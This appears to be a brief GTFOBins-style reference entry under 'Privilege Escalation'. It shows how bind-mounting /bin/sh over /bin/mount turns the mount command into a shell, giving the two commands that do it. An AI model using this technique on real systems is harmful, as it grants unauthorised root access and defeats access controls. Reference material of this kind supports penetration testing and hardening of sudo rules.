mount

Privilege Escalation

This overrides `mount` itself with a shell (or any other executable).

mount -o bind /bin/sh /bin/mount
mount